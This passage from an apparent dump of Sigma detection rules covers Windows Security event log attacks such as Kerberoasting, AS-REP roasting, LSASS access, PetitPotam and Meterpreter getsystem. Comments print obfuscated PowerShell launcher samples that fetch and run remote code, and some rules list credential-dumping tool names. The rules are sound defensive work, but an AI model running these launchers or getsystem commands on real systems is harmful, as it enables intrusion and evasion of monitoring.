    "content": "title: Invoke-Obfuscation Via Use Rundll32 - Security\nid: cd0f7229-d16f-42de-8fe3-fba365fbcb3a\nrelated:\n    - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b\n      type: derived\nstatus: test\ndescription: Detects obfuscated PowerShell via use of Rundll32 in scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task30)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - '&&'\n            - 'rundll32'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n        ServiceFileName|contains:\n            - value\n            - invoke\n            - comspec\n            - iex\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml",
    "content": "title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security\nid: 4c54ba8f-73d2-4d40-8890-d9cf1dca3d30\nrelated:\n    - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6\n      type: derived\nstatus: test\ndescription: Detects obfuscated PowerShell via VAR++ LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-13\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        # ServiceFileName|re: '(?i)&&set.*(\\{\\d\\}){2,}\\\\\\\"\\s+?\\-f.*&&.*cmd.*\\/c' # FPs with |\\/r\n        # Example 1: CMD /C\"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\\wINDowS\\sYsWow64\\winDOWspoWERSheLl\\V1.0\\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\\\"invo`kEcoMm`A`ND\\\".( \\\"{2}{1}{0}\\\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \\\"{0}{1}\\\" -f'D','IR' ) ( \\\"{0}{1}\\\"-f'ENV:kU','R')).\\\"vAl`Ue\\\" )&& CMD /C%mXI%\"\n        # Example 2: c:\\WiNDOWS\\sYSTEm32\\CmD.exE /C \"sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\\\"{2}{0}{1}\\\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \\\"{2}{3}{0}{1}\\\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \\\"{2}{5}{0}{1}{6}{4}{3}\\\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \\\"{0}{1}\\\"-f'd','ejLz' ),( \\\"{1}{2}{0}\\\"-f'cEss','P','RO') )) )&& c:\\WiNDOWS\\sYSTEm32\\CmD.exE /C %ybkm%\"\n        ServiceFileName|contains|all:\n            - '&&set'\n            - 'cmd'\n            - '/c'\n            - '-f'\n        ServiceFileName|contains:\n            - '{0}'\n            - '{1}'\n            - '{2}'\n            - '{3}'\n            - '{4}'\n            - '{5}'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_iso_mount.yml",
    "content": "title: ISO Image Mounted\nid: 0248a7bc-8a9a-4cd8-a57e-3ae8e073a073\nstatus: test\ndescription: Detects the mount of an ISO image on an endpoint\nreferences:\n    - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore\n    - https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages\n    - https://twitter.com/MsftSecIntel/status/1257324139515269121\n    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image\nauthor: Syed Hasan (@syedhasan009)\ndate: 2021-05-29\nmodified: 2023-11-09\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Removable Storage\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 4663\n        ObjectServer: 'Security'\n        ObjectType: 'File'\n        ObjectName|startswith: '\\Device\\CdRom'\n    filter_main_generic:\n        ObjectName:\n            - '\\Device\\CdRom0\\autorun.ico'\n            - '\\Device\\CdRom0\\setup.exe'\n            - '\\Device\\CdRom0\\setup64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Software installation ISO files\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_kerberoasting_activity.yml",
    "content": "title: Kerberoasting Activity - Initial Query\nid: d04ae2b8-ad54-4de0-bd87-4bc1da66aa59\nstatus: test\ndescription: |\n    This rule will collect the data needed to start looking into possible kerberoasting activity.\n    Further analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds.\n    You can then set a threshold for the number of requests and time between the requests to turn this into an alert.\nreferences:\n    - https://www.trustedsec.com/blog/art_of_kerberoast/\n    - https://adsecurity.org/?p=3513\nauthor: '@kostastsale'\ndate: 2022-01-21\nmodified: 2025-10-19\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4769\n        Status: '0x0' # Translated as status from failure code field. Query only for successes\n        TicketEncryptionType: '0x17' # RC4 ticket encryption type\n    filter_main_krbtgt:\n        ServiceName|endswith:\n            - 'krbtgt' # Ignore requests for the krbtgt service\n            - '$' # Ignore requests from service names that end with $ which are associated with genuine kerberos traffic\n    filter_main_machine_accounts:\n        TargetUserName|contains: '$@' # Ignore requests from machines\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legacy applications.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_kerberos_asrep_roasting.yml",
    "content": "title: Potential AS-REP Roasting via Kerberos TGT Requests\nid: 3e2f1b2c-4d5e-11ee-be56-0242ac120002\nstatus: experimental\ndescription: |\n    Detects suspicious Kerberos TGT requests with pre-authentication disabled (Pre-Authentication Type = 0) and Ticket Encryption Type 0x17, i.e., RC4-HMAC.\n    This may indicate an AS-REP Roasting attack, where attackers request AS-REP messages for accounts without pre-authentication and attempt to crack the encrypted ticket offline to recover user passwords.\nreferences:\n    - https://medium.com/system-weakness/detecting-as-rep-roasting-attacks-b5b3965f9714\n    - https://www.picussecurity.com/resource/blog/as-rep-roasting-attack-explained-mitre-attack-t1558.004\nauthor: ANosir\ndate: 2025-05-22\nmodified: 2025-07-04\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4768\n        TicketEncryptionType: '0x17'\n        ServiceName: 'krbtgt'\n        PreAuthType: 0\n    condition: selection\nfalsepositives:\n    - Legacy systems or applications that legitimately use RC4 encryption\n    - Misconfigured accounts with pre-authentication disabled\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_kerberos_coercion_via_dns_object.yml",
    "content": "title: Potential Kerberos Coercion by Spoofing SPNs via DNS Manipulation\nid: b07e58cf-cacc-4135-8473-ccb2eba63dd2\nrelated:\n    - id: e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c # Suspicious DNS Query Indicating Kerberos Coercion via DNS Object Spoofing\n      type: similar\n    - id: 5588576c-5898-4fac-bcdd-7475a60e8f43 # Suspicious DNS Query Indicating Kerberos Coercion via DNS Object Spoofing - Network\n      type: similar\n    - id: 0ed99dda-6a35-11ef-8c99-0242ac120002 # Kerberos Coercion Via DNS SPN Spoofing Attempt\n      type: similar\nstatus: experimental\ndescription: |\n    Detects modifications to DNS records in Active Directory where the Distinguished Name (DN) contains a base64-encoded blob\n    matching the pattern \"1UWhRCAAAAA...BAAAA\". This pattern corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure,\n    commonly used in Kerberos coercion attacks. Adversaries may exploit this to coerce victim systems into authenticating to\n    attacker-controlled hosts by spoofing SPNs via DNS. It is one of the strong indicators of a Kerberos coercion attack,\n    where adversaries manipulate DNS records to spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073.\n    Please investigate the user account that made the changes, as it is likely a low-privileged account that has been compromised.\nreferences:\n    - https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html\n    - https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-20\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1557.003\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: security\n    definition: |\n      By default these events are not logged for MicrosoftDNS objects in Active Directory.\n      To enable detection, configure an AuditRule on the DNS object container with the \"CreateChild\" permission for the \"Everyone\" principal.\n      This can be accomplished using tools such as Set-AuditRule (see https://github.com/OTRF/Set-AuditRule).\ndetection:\n    selection_directory_service_changes:\n        EventID:\n            - 5136\n            - 5137\n        ObjectClass: 'dnsNode'\n        ObjectDN|contains|all: # ObjectDN\">DC=foo-11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,DC=domain.com,CN=MicrosoftDNS,DC=DomainDnsZones,DC=domain,DC=com</Data>\n            - 'UWhRCA'\n            - 'BAAAA'\n            - 'CN=MicrosoftDNS'\n    selection_directory_service_access:\n        EventID: 4662\n        AdditionalInfo|contains|all: # AdditionalInfo\">DC=foo-11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,DC=domain.com,CN=MicrosoftDNS,DC=DomainDnsZones,DC=domain,DC=com</Data>\n            - 'UWhRCA'\n            - 'BAAAA'\n            - 'CN=MicrosoftDNS'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_lm_namedpipe.yml",
    "content": "title: First Time Seen Remote Named Pipe\nid: 52d8b0c6-53d6-439a-9e41-52ad442ad9ad\nstatus: test\ndescription: This detection excludes known named pipes accessible remotely and notifies on newly observed ones, which may help to detect lateral movement and remote execution using named pipes\nreferences:\n    - https://twitter.com/menasec1/status/1104489274387451904\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2023-03-14\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection1:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n    false_positives:\n        RelativeTargetName:\n            - 'atsvc'\n            - 'samr'\n            - 'lsarpc'\n            - 'lsass'\n            - 'winreg'\n            - 'netlogon'\n            - 'srvsvc'\n            - 'protected_storage'\n            - 'wkssvc'\n            - 'browser'\n            - 'netdfs'\n            - 'svcctl'\n            - 'spoolss'\n            - 'ntsvcs'\n            - 'LSM_API_service'\n            - 'HydraLsPipe'\n            - 'TermSrv_API_service'\n            - 'MsFteWds'\n            - 'sql\\query'\n            - 'eventlog'\n    condition: selection1 and not false_positives\nfalsepositives:\n    - Update the excluded named pipe to filter out any newly observed legit named pipe\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml",
    "content": "title: LSASS Access From Non System Account\nid: 962fe167-e48d-4fd6-9974-11e5b9a5d6d1\nstatus: test\ndescription: Detects potential mimikatz-like tools accessing LSASS from non system account\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-06-20\nmodified: 2023-12-11\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4663\n            - 4656\n        AccessMask:\n            - '0x100000'\n            - '0x1010'    # car.2019-04-004\n            - '0x1400'\n            - '0x1410'    # car.2019-04-004\n            - '0x1418'    # car.2019-04-004\n            - '0x1438'    # car.2019-04-004\n            - '0x143a'    # car.2019-04-004\n            - '0x1f0fff'\n            - '0x1f1fff'\n            - '0x1f2fff'\n            - '0x1f3fff'\n            - '0x40'\n            - '143a'    # car.2019-04-004\n            - '1f0fff'\n            - '1f1fff'\n            - '1f2fff'\n            - '1f3fff'\n            # - '0x1000'  # minimum access requirements to query basic info from service\n        ObjectType: 'Process'\n        ObjectName|endswith: '\\lsass.exe'\n    filter_main_service_account:\n        SubjectUserName|endswith: '$'\n    filter_main_generic:\n        ProcessName|contains:\n            # Legitimate AV and EDR solutions\n            - ':\\Program Files\\'\n            - ':\\Program Files (x86)\\'\n    filter_main_wmiprvse:\n        ProcessName: 'C:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n        AccessMask: '0x1410'\n    filter_optional_steam:\n        ProcessName|contains: '\\SteamLibrary\\steamapps\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_mal_creddumper.yml",
    "content": "title: Credential Dumping Tools Service Execution - Security\nid: f0d1feba-4344-4ca9-8121-a6c97bd6df52\nrelated:\n    - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed\n      type: derived\nstatus: test\ndescription: Detects well-known credential dumping tools execution via service execution events\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community\ndate: 2017-03-05\nmodified: 2022-11-29\ntags:\n    - attack.credential-access\n    - attack.execution\n    - attack.t1003.001\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.005\n    - attack.t1003.006\n    - attack.t1569.002\n    - attack.s0005\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains:\n            - 'cachedump'\n            - 'dumpsvc'\n            - 'fgexec'\n            - 'gsecdump'\n            - 'mimidrv'\n            - 'pwdump'\n            - 'servpw'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator using credential dumping tool for password recovery\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_mal_wceaux_dll.yml",
    "content": "title: WCE wceaux.dll Access\nid: 1de68c67-af5c-4097-9c85-fe5578e09e67\nstatus: test\ndescription: Detects wceaux.dll access during WCE pass-the-hash remote command execution on the source host\nreferences:\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet\nauthor: Thomas Patzke\ndate: 2017-06-14\nmodified: 2025-01-30\ntags:\n    - attack.credential-access\n    - attack.t1003\n    - attack.s0005\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4656\n            - 4663\n        ObjectName|endswith: '\\wceaux.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_metasploit_authentication.yml",
    "content": "title: Metasploit SMB Authentication\nid: 72124974-a68b-4366-b990-d30e0b2a190d\nstatus: test\ndescription: Alerts on Metasploit host's authentications on the domain.\nreferences:\n    - https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb\nauthor: Chakib Gzenayi (@Chak092), Hosni Mribah\ndate: 2020-05-06\nmodified: 2024-01-25\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID:\n            - 4625\n            - 4624\n        LogonType: 3\n        AuthenticationPackageName: 'NTLM'\n        WorkstationName|re: '^[A-Za-z0-9]{16}$'\n    selection2:\n        EventID: 4776\n        Workstation|re: '^[A-Za-z0-9]{16}$'\n    condition: 1 of selection*\nfalsepositives:\n    - Linux hostnames composed of 16 characters.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml",
    "content": "title: Metasploit Or Impacket Service Installation Via SMB PsExec\nid: 6fb63b40-e02a-403e-9ffd-3bcc1d749442\nrelated:\n    - id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0\n      type: derived\nstatus: test\ndescription: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation\nreferences:\n    - https://bczyz1.github.io/2021/01/30/psexec.html\nauthor: Bartlomiej Czyz, Relativity\ndate: 2021-01-21\nmodified: 2022-10-05\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1570\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|re: '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$'\n        ServiceName|re: '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)'\n        ServiceStartType: 3  # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697\n        ServiceType: '0x10'\n    filter:\n        ServiceName: 'PSEXESVC'\n    condition: selection and not filter\nfalsepositives:\n    - Possible, different agents with an 8-character binary and a 4-, 8- or 16-character service name\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml",
    "content": "title: Meterpreter or Cobalt Strike Getsystem Service Installation - Security\nid: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34\nrelated:\n    - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6\n      type: derived\nstatus: test\ndescription: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/\nauthor: Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)\ndate: 2019-10-26\nmodified: 2023-11-15\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134.001\n    - attack.t1134.002\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection_eid:\n        EventID: 4697\n    selection_cli_cmd:\n        # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        ServiceFileName|contains|all:\n            - '/c'\n            - 'echo'\n            - '\\pipe\\'\n        ServiceFileName|contains:\n            - 'cmd'\n            - '%COMSPEC%'\n    selection_cli_rundll:\n        # meterpreter getsystem technique 2: rundll32.exe C:\\Users\\test\\AppData\\Local\\Temp\\tmexsn.dll,a /p:tmexsn\n        ServiceFileName|contains|all:\n            - 'rundll32'\n            - '.dll,a'\n            - '/p:'\n    selection_cli_share:\n        ServiceFileName|startswith: '\\\\\\\\127.0.0.1\\\\ADMIN$\\'  # https://twitter.com/svch0st/status/1413688851877416960?lang=en\n    condition: selection_eid and 1 of selection_cli_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml",
    "content": "title: NetNTLM Downgrade Attack\nid: d3abac66-f11c-4ed0-8acb-50cc29c97eed\nrelated:\n    - id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2\n      type: derived\nstatus: test\ndescription: Detects NetNTLM downgrade attack\nreferences:\n    - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks\nauthor: Florian Roth (Nextron Systems), wagga\ndate: 2018-03-20\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1112\n# Windows Security Eventlog: Process Creation with Full Command Line\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Object Access > Audit Registry (Success)'\ndetection:\n    selection:\n        EventID: 4657\n        ObjectName|contains|all:\n            - '\\REGISTRY\\MACHINE\\SYSTEM'\n            - 'ControlSet'\n            - '\\Control\\Lsa'\n        ObjectValueName:\n            - 'LmCompatibilityLevel'\n            - 'NtlmMinClientSec'\n            - 'RestrictSendingNTLMTraffic'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml",
    "content": "title: Windows Network Access Suspicious desktop.ini Action\nid: 35bc7e28-ee6b-492f-ab04-da58fcf6402e\nstatus: test\ndescription: Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.\nreferences:\n    - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/\nauthor: Tim Shelton (HAWK.IO)\ndate: 2021-12-06\nmodified: 2022-01-16\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.009\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        ObjectType: File\n        RelativeTargetName|endswith: '\\desktop.ini'\n        AccessList|contains:\n            - 'WriteData'\n            - 'DELETE'\n            - 'WriteDAC'\n            - 'AppendData'\n            - 'AddSubdirectory'\n    condition: selection\nfalsepositives:\n    - Read only access list authority\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml",
    "content": "title: New or Renamed User Account with '$' Character\nid: cfeed607-6aa4-4bbd-9627-b637deb723c8\nstatus: test\ndescription: |\n    Detects the creation of a user with the \"$\" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.\nreferences:\n    - https://twitter.com/SBousseaden/status/1387743867663958021\nauthor: Ilyas Ochkov, oscd.community\ndate: 2019-10-25\nmodified: 2024-01-16\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_create:\n        EventID: 4720 # create user\n        SamAccountName|contains: '$'\n    selection_rename:\n        EventID: 4781 # rename user\n        NewTargetUserName|contains: '$'\n    filter_main_homegroup:\n        EventID: 4720\n        TargetUserName: 'HomeGroupUser$'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml",
    "content": "title: Denied Access To Remote Desktop\nid: 8e5c03fa-b7f0-11ea-b242-07e0576828d9\nstatus: test\ndescription: |\n  This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\n  Often, this event can be generated by attackers when searching for available Windows servers in the network.\nreferences:\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825\nauthor: Pushkarev Dmitry\ndate: 2020-06-27\nmodified: 2021-11-27\ntags:\n    - attack.lateral-movement\n    - attack.t1021.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4825\n    condition: selection\nfalsepositives:\n    - Valid user was not added to RDP group\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_password_policy_enumerated.yml",
    "content": "title: Password Policy Enumerated\nid: 12ba6a38-adb3-4d6b-91ba-a7fb248e3199\nstatus: test\ndescription: Detects when the password policy is enumerated.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4661\n    - https://github.com/jpalanco/alienvault-ossim/blob/f74359c0c027e42560924b5cff25cdf121e5505a/os-sim/agent/src/ParserUtil.py#L951\nauthor: Zach Mathis\ndate: 2023-05-19\ntags:\n    - attack.discovery\n    - attack.t1201\nlogsource:\n    product: windows\n    service: security\n    definition: dfd8c0f4-e6ad-4e07-b91b-f2fca0ddef64\ndetection:\n    selection:\n        EventID: 4661 # A handle to an object was requested.\n        AccessList|contains: '%%5392' # ReadPasswordParameters\n        ObjectServer: 'Security Account Manager'\n    condition: selection\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_pcap_drivers.yml",
    "content": "title: Windows Pcap Drivers\nid: 7b687634-ab20-11ea-bb37-0242ac130002\nstatus: test\ndescription: Detects Windows Pcap driver installation based on a list of associated .sys files.\nreferences:\n    - https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more\nauthor: Cian Heasley\ndate: 2020-06-10\nmodified: 2023-04-14\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1040\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains:\n            - 'pcap'\n            - 'npcap'\n            - 'npf'\n            - 'nm3'\n            - 'ndiscap'\n            - 'nmnt'\n            - 'windivert'\n            - 'USBPcap'\n            - 'pktmon'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_petitpotam_network_share.yml",
    "content": "title: Possible PetitPotam Coerce Authentication Attempt\nid: 1ce8c8a3-2723-48ed-8246-906ac91061a6\nstatus: test\ndescription: Detect PetitPotam coerced authentication activity.\nreferences:\n    - https://github.com/topotam/PetitPotam\n    - https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml\nauthor: Mauricio Velazco, Michael Haag\ndate: 2021-09-02\nmodified: 2022-08-11\ntags:\n    - attack.credential-access\n    - attack.t1187\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 5145\n        ShareName|startswith: '\\\\\\\\' # looking for the string \\\\something\\IPC$\n        ShareName|endswith: '\\IPC$'\n        RelativeTargetName: lsarpc\n        SubjectUserName: ANONYMOUS LOGON\n    condition: selection\nfalsepositives:\n    - Unknown. Feedback welcomed.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml",
    "content": "title: PetitPotam Suspicious Kerberos TGT Request\nid: 6a53d871-682d-40b6-83e0-b7c1a6c4e3a5\nstatus: test\ndescription: |\n    Detect suspicious Kerberos TGT requests.\n    Once an attacker obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\n    One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\n    This request will generate a 4768 event with some unusual fields depending on the environment.\n    This analytic will require tuning; we recommend filtering Account_Name to the Domain Controller computer accounts.\nreferences:\n    - https://github.com/topotam/PetitPotam\n    - https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/\n    - https://github.com/splunk/security_content/blob/88d689fe8a055d8284337b9fad5d9152b42043db/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml\nauthor: Mauricio Velazco, Michael Haag\ndate: 2021-09-02\nmodified: 2022-10-05\ntags:\n    - attack.credential-access\n    - attack.t1187\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Account Logon > Kerberos Authentication Service\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 4768\n        TargetUserName|endswith: '$'\n        CertThumbprint|contains: '*'\n    filter_local:\n        IpAddress: '::1'\n    filter_thumbprint:\n        CertThumbprint: ''\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_possible_dc_shadow.yml",
